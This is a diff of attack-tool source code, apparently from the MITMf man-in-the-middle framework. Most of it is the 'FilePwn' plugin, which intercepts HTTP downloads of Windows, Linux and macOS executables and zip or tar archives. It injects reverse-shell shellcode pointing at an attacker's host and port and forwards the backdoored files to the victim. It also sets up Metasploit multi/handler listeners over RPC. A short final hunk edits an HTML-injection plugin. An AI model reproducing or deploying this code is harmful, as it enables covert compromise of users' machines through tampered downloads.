|
# All rights reserved.
|
||||||
|
#
|
||||||
|
# Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
# are permitted provided that the following conditions are met:
|
||||||
|
#
|
||||||
|
# 1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer.
|
||||||
|
#
|
||||||
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer in the documentation
|
||||||
|
# and/or other materials provided with the distribution.
|
||||||
|
#
|
||||||
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
# may be used to endorse or promote products derived from this software without
|
||||||
|
# specific prior written permission.
|
||||||
|
#
|
||||||
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
# POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
#
|
||||||
|
# Tested on Kali-Linux.
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
import pefile
|
||||||
|
import zipfile
|
||||||
|
import logging
|
||||||
|
import shutil
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import tarfile
|
||||||
|
import multiprocessing
|
||||||
|
|
||||||
|
from libs.bdfactory import pebin
|
||||||
|
from libs.bdfactory import elfbin
|
||||||
|
from libs.bdfactory import machobin
|
||||||
|
from core.msfrpc import Msfrpc
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from tempfile import mkstemp
|
||||||
|
from configobj import ConfigObj
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class FilePwn(Plugin):
|
||||||
|
name = "FilePwn"
|
||||||
|
optname = "filepwn"
|
||||||
|
desc = "Backdoor executables being sent over http using bdfactory"
|
||||||
|
implements = ["handleResponse"]
|
||||||
|
tree_output = ["BDFProxy v0.3.2 online"]
|
||||||
|
version = "0.3"
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
self.patched = multiprocessing.Queue()
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||||
|
|
||||||
|
#USED NOW
|
||||||
|
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
||||||
|
'pe': {'number': 'MZ', 'offset': 0},
|
||||||
|
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
||||||
|
'bz': {'number': 'BZ', 'offset': 0},
|
||||||
|
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
||||||
|
'tar': {'number': 'ustar', 'offset': 257},
|
||||||
|
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
}
|
||||||
|
|
||||||
|
#NOT USED NOW
|
||||||
|
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
|
#FilePwn options
|
||||||
|
self.userConfig = self.config['FilePwn']
|
||||||
|
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||||
|
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||||
|
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||||
|
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
||||||
|
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
||||||
|
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
||||||
|
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
||||||
|
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
||||||
|
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
||||||
|
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
||||||
|
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||||
|
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||||
|
|
||||||
|
#Metasploit options
|
||||||
|
msfcfg = self.config['MITMf']['Metasploit']
|
||||||
|
rpcip = msfcfg['rpcip']
|
||||||
|
rpcpass = msfcfg['rpcpass']
|
||||||
|
|
||||||
|
try:
|
||||||
|
msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||||
|
msf.login('msf', rpcpass)
|
||||||
|
version = msf.call('core.version')['version']
|
||||||
|
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||||
|
except Exception:
|
||||||
|
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||||
|
|
||||||
|
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||||
|
jobs = msf.call('job.list')
|
||||||
|
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
||||||
|
cmd = "use exploit/multi/handler\n"
|
||||||
|
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
||||||
|
cmd += "set LHOST {}\n".format(config["HOST"])
|
||||||
|
cmd += "set LPORT {}\n".format(config["PORT"])
|
||||||
|
cmd += "exploit -j\n"
|
||||||
|
|
||||||
|
if jobs:
|
||||||
|
for pid, name in jobs.iteritems():
|
||||||
|
info = msf.call('job.info', [pid])
|
||||||
|
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
|
||||||
|
#Create a virtual console
|
||||||
|
c_id = msf.call('console.create')['id']
|
||||||
|
|
||||||
|
#write the cmd to the newly created console
|
||||||
|
msf.call('console.write', [c_id, cmd])
|
||||||
|
else:
|
||||||
|
#Create a virtual console
|
||||||
|
c_id = msf.call('console.create')['id']
|
||||||
|
|
||||||
|
#write the cmd to the newly created console
|
||||||
|
msf.call('console.write', [c_id, cmd])
|
||||||
|
|
||||||
|
def onConfigChange(self):
|
||||||
|
self.initialize(self.options)
|
||||||
|
|
||||||
|
def convert_to_Bool(self, aString):
|
||||||
|
if aString.lower() == 'true':
|
||||||
|
return True
|
||||||
|
elif aString.lower() == 'false':
|
||||||
|
return False
|
||||||
|
elif aString.lower() == 'none':
|
||||||
|
return None
|
||||||
|
|
||||||
|
def bytes_have_format(self, bytess, formatt):
|
||||||
|
number = self.magicNumbers[formatt]
|
||||||
|
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def binaryGrinder(self, binaryFile):
|
||||||
|
"""
|
||||||
|
Feed potential binaries into this function,
|
||||||
|
it will return the result PatchedBinary, False, or None
|
||||||
|
"""
|
||||||
|
|
||||||
|
with open(binaryFile, 'r+b') as f:
|
||||||
|
binaryTMPHandle = f.read()
|
||||||
|
|
||||||
|
binaryHeader = binaryTMPHandle[:4]
|
||||||
|
result = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
if binaryHeader[:2] == 'MZ': # PE/COFF
|
||||||
|
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
|
||||||
|
magic = pe.OPTIONAL_HEADER.Magic
|
||||||
|
machineType = pe.FILE_HEADER.Machine
|
||||||
|
|
||||||
|
#update when supporting more than one arch
|
||||||
|
if (magic == int('20B', 16) and machineType == 0x8664 and
|
||||||
|
self.WindowsType.lower() in ['all', 'x64']):
|
||||||
|
add_section = False
|
||||||
|
cave_jumping = False
|
||||||
|
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
||||||
|
add_section = True
|
||||||
|
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.WindowsIntelx64['SHELL'],
|
||||||
|
HOST=self.WindowsIntelx64['HOST'],
|
||||||
|
PORT=int(self.WindowsIntelx64['PORT']),
|
||||||
|
ADD_SECTION=add_section,
|
||||||
|
CAVE_JUMPING=cave_jumping,
|
||||||
|
IMAGE_TYPE=self.WindowsType,
|
||||||
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||||
|
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||||
|
)
|
||||||
|
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif (machineType == 0x14c and
|
||||||
|
self.WindowsType.lower() in ['all', 'x86']):
|
||||||
|
add_section = False
|
||||||
|
cave_jumping = False
|
||||||
|
#add_section wins for cave_jumping
|
||||||
|
#default is single for BDF
|
||||||
|
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
||||||
|
add_section = True
|
||||||
|
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.WindowsIntelx86['SHELL'],
|
||||||
|
HOST=self.WindowsIntelx86['HOST'],
|
||||||
|
PORT=int(self.WindowsIntelx86['PORT']),
|
||||||
|
ADD_SECTION=add_section,
|
||||||
|
CAVE_JUMPING=cave_jumping,
|
||||||
|
IMAGE_TYPE=self.WindowsType,
|
||||||
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||||
|
)
|
||||||
|
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||||
|
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
|
targetFile.support_check()
|
||||||
|
|
||||||
|
if targetFile.class_type == 0x1:
|
||||||
|
#x86CPU Type
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.LinuxIntelx86['SHELL'],
|
||||||
|
HOST=self.LinuxIntelx86['HOST'],
|
||||||
|
PORT=int(self.LinuxIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
IMAGE_TYPE=self.LinuxType
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
elif targetFile.class_type == 0x2:
|
||||||
|
#x64
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.LinuxIntelx64['SHELL'],
|
||||||
|
HOST=self.LinuxIntelx64['HOST'],
|
||||||
|
PORT=int(self.LinuxIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
IMAGE_TYPE=self.LinuxType
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
|
targetFile.support_check()
|
||||||
|
|
||||||
|
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||||
|
|
||||||
|
if targetFile.FAT_FILE is True:
|
||||||
|
if self.FatPriority == 'x86':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif self.FatPriority == 'x64':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
self.patched.put(result)
|
||||||
|
return
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
print 'Exception', str(e)
|
||||||
|
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
||||||
|
return None
|
||||||
|
|
||||||
|
def tar_files(self, aTarFileBytes, formatt):
|
||||||
|
"When called will unpack and edit a Tar File and return a tar file"
|
||||||
|
|
||||||
|
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
||||||
|
|
||||||
|
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||||
|
print "[!] TarFile over allowed size"
|
||||||
|
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||||
|
tarFileStorage.write(aTarFileBytes)
|
||||||
|
tarFileStorage.flush()
|
||||||
|
|
||||||
|
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||||
|
print '[!] Not a tar file'
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
compressionMode = ':'
|
||||||
|
if formatt == 'gz':
|
||||||
|
compressionMode = ':gz'
|
||||||
|
if formatt == 'bz':
|
||||||
|
compressionMode = ':bz2'
|
||||||
|
|
||||||
|
tarFile = None
|
||||||
|
try:
|
||||||
|
tarFileStorage.seek(0)
|
||||||
|
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
||||||
|
except tarfile.ReadError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if tarFile is None:
|
||||||
|
print '[!] Not a tar file'
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
print '[*] Tar file contents and info:'
|
||||||
|
print '[*] Compression:', formatt
|
||||||
|
|
||||||
|
members = tarFile.getmembers()
|
||||||
|
for info in members:
|
||||||
|
print "\t", info.name, info.mtime, info.size
|
||||||
|
|
||||||
|
newTarFileStorage = tempfile.NamedTemporaryFile()
|
||||||
|
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
||||||
|
|
||||||
|
patchCount = 0
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
|
for info in members:
|
||||||
|
print "[*] >>> Next file in tarfile:", info.name
|
||||||
|
|
||||||
|
if not info.isfile():
|
||||||
|
print info.name, 'is not a file'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if info.size >= long(self.FileSizeMax):
|
||||||
|
print info.name, 'is too big'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check against keywords
|
||||||
|
keywordCheck = False
|
||||||
|
|
||||||
|
if type(self.tarblacklist) is str:
|
||||||
|
if self.tarblacklist.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
|
||||||
|
else:
|
||||||
|
for keyword in self.tarblacklist:
|
||||||
|
if keyword.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
continue
|
||||||
|
|
||||||
|
if keywordCheck is True:
|
||||||
|
print "[!] Tar blacklist enforced!"
|
||||||
|
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Try to patch
|
||||||
|
extractedFile = tarFile.extractfile(info)
|
||||||
|
|
||||||
|
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
||||||
|
newTarFile.addfile(info, extractedFile)
|
||||||
|
else:
|
||||||
|
# create the file on disk temporarily for fileGrinder to run on it
|
||||||
|
with tempfile.NamedTemporaryFile() as tmp:
|
||||||
|
shutil.copyfileobj(extractedFile, tmp)
|
||||||
|
tmp.flush()
|
||||||
|
patchResult = self.binaryGrinder(tmp.name)
|
||||||
|
if patchResult:
|
||||||
|
patchCount += 1
|
||||||
|
file2 = "backdoored/" + os.path.basename(tmp.name)
|
||||||
|
print "[*] Patching complete, adding to tar file."
|
||||||
|
info.size = os.stat(file2).st_size
|
||||||
|
with open(file2, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
|
else:
|
||||||
|
print "[!] Patching failed"
|
||||||
|
with open(tmp.name, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
||||||
|
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||||
|
mitmf_logger.info("Met Tar config patchCount limit.")
|
||||||
|
|
||||||
|
# finalize the writing of the tar file first
|
||||||
|
newTarFile.close()
|
||||||
|
|
||||||
|
# then read the new tar file into memory
|
||||||
|
newTarFileStorage.seek(0)
|
||||||
|
ret = newTarFileStorage.read()
|
||||||
|
newTarFileStorage.close() # it's automatically deleted
|
||||||
|
|
||||||
|
if wasPatched is False:
|
||||||
|
# If nothing was changed return the original
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
self.patched.put(ret)
|
||||||
|
return
|
||||||
|
|
||||||
|
def zip_files(self, aZipFile):
|
||||||
|
"When called will unpack and edit a Zip File and return a zip file"
|
||||||
|
|
||||||
|
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
||||||
|
|
||||||
|
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||||
|
print "[!] ZipFile over allowed size"
|
||||||
|
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
||||||
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
|
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||||
|
tmpDir = '/tmp/' + tmpRan
|
||||||
|
tmpFile = '/tmp/' + tmpRan + '.zip'
|
||||||
|
|
||||||
|
os.mkdir(tmpDir)
|
||||||
|
|
||||||
|
with open(tmpFile, 'w') as f:
|
||||||
|
f.write(aZipFile)
|
||||||
|
|
||||||
|
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
||||||
|
|
||||||
|
#encryption test
|
||||||
|
try:
|
||||||
|
zippyfile.testzip()
|
||||||
|
|
||||||
|
except RuntimeError as e:
|
||||||
|
if 'encrypted' in str(e):
|
||||||
|
mitmf_logger.info('Encrypted zipfile found. Not patching.')
|
||||||
|
return aZipFile
|
||||||
|
|
||||||
|
print "[*] ZipFile contents and info:"
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
print "\t", info.filename, info.date_time, info.file_size
|
||||||
|
|
||||||
|
zippyfile.extractall(tmpDir)
|
||||||
|
|
||||||
|
patchCount = 0
|
||||||
|
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
print "[*] >>> Next file in zipfile:", info.filename
|
||||||
|
|
||||||
|
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
||||||
|
print info.filename, 'is a directory'
|
||||||
|
continue
|
||||||
|
|
||||||
|
#Check against keywords
|
||||||
|
keywordCheck = False
|
||||||
|
|
||||||
|
if type(self.zipblacklist) is str:
|
||||||
|
if self.zipblacklist.lower() in info.filename.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
|
||||||
|
else:
|
||||||
|
for keyword in self.zipblacklist:
|
||||||
|
if keyword.lower() in info.filename.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
continue
|
||||||
|
|
||||||
|
if keywordCheck is True:
|
||||||
|
print "[!] Zip blacklist enforced!"
|
||||||
|
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
||||||
|
continue
|
||||||
|
|
||||||
|
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||||
|
|
||||||
|
if patchResult:
|
||||||
|
patchCount += 1
|
||||||
|
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||||
|
print "[*] Patching complete, adding to zip file."
|
||||||
|
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||||
|
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
|
else:
|
||||||
|
print "[!] Patching failed"
|
||||||
|
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
||||||
|
|
||||||
|
print '-' * 10
|
||||||
|
|
||||||
|
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
||||||
|
mitmf_logger.info("Met Zip config patchCount limit.")
|
||||||
|
break
|
||||||
|
|
||||||
|
zippyfile.close()
|
||||||
|
|
||||||
|
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
||||||
|
|
||||||
|
print "[*] Writing to zipfile:", tmpFile
|
||||||
|
|
||||||
|
for base, dirs, files in os.walk(tmpDir):
|
||||||
|
for afile in files:
|
||||||
|
filename = os.path.join(base, afile)
|
||||||
|
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
||||||
|
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||||
|
|
||||||
|
zipResult.close()
|
||||||
|
#clean up
|
||||||
|
shutil.rmtree(tmpDir)
|
||||||
|
|
||||||
|
with open(tmpFile, 'rb') as f:
|
||||||
|
tempZipFile = f.read()
|
||||||
|
os.remove(tmpFile)
|
||||||
|
|
||||||
|
if wasPatched is False:
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
self.patched.put(tempZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
content_header = request.client.headers['Content-Type']
|
||||||
|
client_ip = request.client.getClientIP()
|
||||||
|
|
||||||
|
if content_header in self.zipMimeTypes:
|
||||||
|
|
||||||
|
if self.bytes_have_format(data, 'zip'):
|
||||||
|
mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_zip = self.patched.get()
|
||||||
|
|
||||||
|
if bd_zip:
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_zip}
|
||||||
|
|
||||||
|
else:
|
||||||
|
for tartype in ['gz','bz','tar']:
|
||||||
|
if self.bytes_have_format(data, tartype):
|
||||||
|
mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_tar = self.patched.get()
|
||||||
|
|
||||||
|
if bd_tar:
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_tar}
|
||||||
|
|
||||||
|
|
||||||
|
elif content_header in self.binaryMimeTypes:
|
||||||
|
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||||
|
if self.bytes_have_format(data, bintype):
|
||||||
|
mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
|
||||||
|
fd, tmpFile = mkstemp()
|
||||||
|
with open(tmpFile, 'w') as f:
|
||||||
|
f.write(data)
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
patchb = self.patched.get()
|
||||||
|
|
||||||
|
if patchb:
|
||||||
|
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||||
|
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_binary}
|
||||||
|
|
||||||
|
else:
|
||||||
|
mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
||||||
|
return {'request': request, 'data': data}
|
|
@ -53,18 +53,6 @@ class Inject(CacheKill, Plugin):
|
||||||
self.match_str = options.match_str
|
self.match_str = options.match_str
|
||||||
self.html_payload = options.html_payload
|
self.html_payload = options.html_payload
|
||||||
|
|
||||||
if self.white_ips:
|
|
||||||
temp = []
|
|
||||||
for ip in self.white_ips.split(','):
|
|
||||||
temp.append(ip)
|
|
||||||
self.white_ips = temp
|
|
||||||
|
|
||||||
if self.black_ips:
|
|
||||||
temp = []
|
|
||||||
for ip in self.black_ips.split(','):
|
|
||||||
temp.append(ip)
|
|
||||||
self.black_ips = temp
|
|
||||||
|
|
||||||
if self.options.preserve_cache:
|
if self.options.preserve_cache:
|
||||||
self.implements.remove("handleHeader")
|
self.implements.remove("handleHeader")
|
||||||
self.implements.remove("connectionMade")
|
self.implements.remove("connectionMade")
|
||||||
|
@ -82,8 +70,8 @@ class Inject(CacheKill, Plugin):
|
||||||
